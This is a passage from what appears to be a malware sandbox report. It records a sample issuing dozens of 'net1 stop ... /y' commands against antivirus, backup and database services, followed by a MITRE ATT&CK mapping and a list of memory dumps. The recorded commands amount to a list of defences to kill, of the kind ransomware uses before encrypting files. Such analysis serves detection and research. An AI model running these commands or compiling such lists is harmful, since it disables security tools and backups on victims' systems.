1⤵
PID:14592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:14584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:14576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:14568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:14560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:14544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:14536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:14528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:5296

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:5252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:13020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:13064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:5172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:12416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:12064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:10664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:13100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:12968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:13052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:5196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:13092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:13008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:11896

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:10260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:11792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:8396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:7668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:8352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:10124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:11752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:12120

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:12080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:12216

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:12400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:12580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:12432

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:12112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:11776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:12408

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:11720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:12224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:12104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:11736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:11696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:7552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:10164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:7584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:7696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:7688

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:7640

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:5096

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:4748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:5552
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop BMR Boot Service /y
  2⤵
  PID:5172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:15804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:6584

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:3928

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4800

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5260

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/416-12-0x0000022EE84A6000-0x0000022EE84A8000-memory.dmp

Filesize
8KB

Download
memory/416-11-0x0000022EE8FC0000-0x0000022EE8FC1000-memory.dmp

Filesize
4KB

Download
memory/416-10-0x0000022EE84A3000-0x0000022EE84A5000-memory.dmp

Filesize
8KB

Download
memory/416-9-0x0000022EE84A0000-0x0000022EE84A2000-memory.dmp

Filesize
8KB

Download
memory/416-7-0x0000022EE8450000-0x0000022EE8451000-memory.dmp

Filesize
4KB

Download
memory/416-6-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/728-2-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/728-3-0x0000000000790000-0x0000000000791000-memory.dmp

Filesize
4KB

Download
memory/728-8-0x000000001B8D0000-0x000000001B8D2000-memory.dmp

Filesize
8KB

Download
memory/1324-98-0x000002186A576000-0x000002186A578000-memory.dmp

Filesize
8KB

Download
memory/1324-17-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/1324-27-0x000002186A570000-0x000002186A572000-memory.dmp

Filesize
8KB

Download
memory/1324-29-0x000002186A573000-0x000002186A575000-memory.dmp

Filesize
8KB

Download
memory/1324-176-0x000002186A578000-0x000002186A579000-memory.dmp

Filesize
4KB

Download
memory/1336-30-0x0000026430870000-0x0000026430872000-memory.dmp

Filesize
8KB

Download
memory/1336-19-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/1336-113-0x0000026430876000-0x0000026430878000-memory.dmp

Filesize
8KB

Download
memory/1336-175-0x0000026430878000-0x0000026430879000-memory.dmp

Filesize
4KB

Download
memory/1336-34-0x0000026430873000-0x0000026430875000-memory.dmp

Filesize
8KB

Download
memory/1724-123-0x000001F169576000-0x000001F169578000-memory.dmp

Filesize
8KB

Download
memory/1724-167-0x000001F169578000-0x000001F169579000-memory.dmp

Filesize
4KB

Download
memory/1724-49-0x000001F169573000-0x000001F169575000-memory.dmp

Filesize
8KB

Download
memory/1724-23-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/1724-43-0x000001F169570000-0x000001F169572000-memory.dmp

Filesize
8KB

Download
memory/2240-230-0x000001E6F7958000-0x000001E6F7959000-memory.dmp

Filesize
4KB

Download
memory/2240-152-0x000001E6F7956000-0x000001E6F7958000-memory.dmp

Filesize
8KB

Download
memory/2240-42-0x000001E6F7953000-0x000001E6F7955000-memory.dmp

Filesize
8KB

Download
memory/2240-39-0x000001E6F7950000-0x000001E6F7952000-memory.dmp

Filesize
8KB

Download
memory/2240-32-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/2836-31-0x0000020DF1230000-0x0000020DF1232000-memory.dmp

Filesize
8KB

Download
memory/2836-173-0x0000020DF1238000-0x0000020DF1239000-memory.dmp

Filesize
4KB

Download
memory/2836-33-0x0000020DF1233000-0x0000020DF1235000-memory.dmp

Filesize
8KB

Download
memory/2836-119-0x0000020DF1236000-0x0000020DF1238000-memory.dmp

Filesize
8KB

Download
memory/2836-26-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/3364-41-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/3364-139-0x00000222338E6000-0x00000222338E8000-memory.dmp

Filesize
8KB

Download
memory/3364-177-0x00000222338E8000-0x00000222338E9000-memory.dmp

Filesize
4KB

Download
memory/3364-46-0x00000222338E3000-0x00000222338E5000-memory.dmp

Filesize
8KB

Download
memory/3364-44-0x00000222338E0000-0x00000222338E2000-memory.dmp

Filesize
8KB

Download
memory/3876-21-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/3876-35-0x000002D73C050000-0x000002D73C052000-memory.dmp

Filesize
8KB

Download
memory/3876-117-0x000002D73C056000-0x000002D73C058000-memory.dmp

Filesize
8KB

Download
memory/3876-174-0x000002D73C058000-0x000002D73C059000-memory.dmp

Filesize
4KB

Download
memory/3876-36-0x000002D73C053000-0x000002D73C055000-memory.dmp

Filesize
8KB

Download
memory/4128-62-0x0000025BDC490000-0x0000025BDC492000-memory.dmp

Filesize
8KB

Download
memory/4128-47-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/4128-154-0x0000025BDC496000-0x0000025BDC498000-memory.dmp

Filesize
8KB

Download
memory/4128-233-0x0000025BDC498000-0x0000025BDC499000-memory.dmp

Filesize
4KB

Download
memory/4128-63-0x0000025BDC493000-0x0000025BDC495000-memory.dmp

Filesize
8KB

Download
memory/4260-65-0x0000016B04760000-0x0000016B04762000-memory.dmp

Filesize
8KB

Download
memory/4260-67-0x0000016B04763000-0x0000016B04765000-memory.dmp

Filesize
8KB

Download
memory/4260-51-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/4260-153-0x0000016B04766000-0x0000016B04768000-memory.dmp

Filesize
8KB

Download
memory/4260-232-0x0000016B04768000-0x0000016B04769000-memory.dmp

Filesize
4KB

Download
memory/4412-155-0x0000017C61BD6000-0x0000017C61BD8000-memory.dmp

Filesize
8KB

Download
memory/4412-81-0x0000017C61BD3000-0x0000017C61BD5000-memory.dmp

Filesize
8KB

Download
memory/4412-57-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/4412-79-0x0000017C61BD0000-0x0000017C61BD2000-memory.dmp

Filesize
8KB

Download
memory/4412-231-0x0000017C61BD8000-0x0000017C61BD9000-memory.dmp

Filesize
4KB

Download
memory/4512-156-0x0000028E19B36000-0x0000028E19B38000-memory.dmp

Filesize
8KB

Download
memory/4512-71-0x0000028E19B33000-0x0000028E19B35000-memory.dmp

Filesize
8KB

Download
memory/4512-69-0x0000028E19B30000-0x0000028E19B32000-memory.dmp

Filesize
8KB

Download
memory/4512-229-0x0000028E19B38000-0x0000028E19B39000-memory.dmp

Filesize
4KB

Download
memory/4512-61-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/4628-228-0x000001969B4A8000-0x000001969B4A9000-memory.dmp

Filesize
4KB

Download
memory/4628-157-0x000001969B4A6000-0x000001969B4A8000-memory.dmp

Filesize
8KB

Download
memory/4628-74-0x000001969B4A0000-0x000001969B4A2000-memory.dmp

Filesize
8KB

Download
memory/4628-77-0x000001969B4A3000-0x000001969B4A5000-memory.dmp

Filesize
8KB

Download
memory/4628-66-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/5776-138-0x000001A2442C3000-0x000001A2442C5000-memory.dmp

Filesize
8KB

Download
memory/5776-234-0x000001A2442C8000-0x000001A2442C9000-memory.dmp

Filesize
4KB

Download
memory/5776-162-0x000001A244290000-0x000001A244291000-memory.dmp

Filesize
4KB

Download
memory/5776-163-0x000001A2442C6000-0x000001A2442C8000-memory.dmp

Filesize
8KB

Download
memory/5776-137-0x000001A2442C0000-0x000001A2442C2000-memory.dmp

Filesize
8KB

Download
memory/5776-132-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/11556-143-0x00007FF99FBF0000-0x00007FF9A05DC000-memory.dmp

Filesize
9.9MB

Download
memory/11556-145-0x0000025470103000-0x0000025470105000-memory.dmp

Filesize
8KB

Download
memory/11556-144-0x0000025470100000-0x0000025470102000-memory.dmp

Filesize
8KB

Download
memory/11556-165-0x0000025470106000-0x0000025470108000-memory.dmp

Filesize
8KB

Download